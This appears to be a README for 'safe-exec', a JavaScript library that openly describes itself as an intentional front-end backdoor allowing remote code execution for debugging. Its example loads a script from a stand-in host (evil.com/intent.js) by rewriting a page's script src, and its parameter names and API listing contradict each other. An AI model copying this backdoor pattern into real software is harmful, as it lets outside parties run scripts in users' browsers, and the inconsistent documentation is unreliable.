safe-exec

safe-exec

Controlled remote code execution. Great for debugging on a live server. Extremely dangerous for everything else.

Uses RSA key pairs.

Installation

Via npm:

npm install safe-exec

Via Bower:

bower install safe-exec

Test

make test

Example

Visit page with very some specific query parameters:

• publicKey - plain text passphrase. WARNING: Persisted in session.
• message - optional value of any kind.

http://example.com?privateKey=foobar&message=http://evil.com/intent.js

Then somewhere in your code:

const success = (message) => {
  let victim = document.querySelector('script[src="foobar.js"]');

  victim.setAttribute('src', message);
};

const failure = (error) => {
  console.log(error);
};

exec(location.search, 'somereallylongcipher', sessionStorage, success, failure);

FAQ

Wow this is a great idea! Should I use this in production?

You should never use this in a production environment. This library creates an intentional backdoor for your front-end, which is a huge security risk.

Why would you intentionally build a backdoor?

This is useful for environments that are difficult replicate on your local machine. It helps to speed up development and debugging.

API

exec(search, publicKey, sessionStorage, cb) → boolean

Executes code if a valid public/private key pair is present.

• search - should just be window.location.search.
• publicKey - any valid RSA public key.
• sessionStorage - pass a reference to DOM sessionStorage to persist execution across session.
• success - callback message => where code execution is defined.
• error - callback error => giving the object where the error occurred.

Returns true on success and false on failure.

License

MIT

---

pori.io  ·  GitHub @pori  ·  Twitter @pori_alex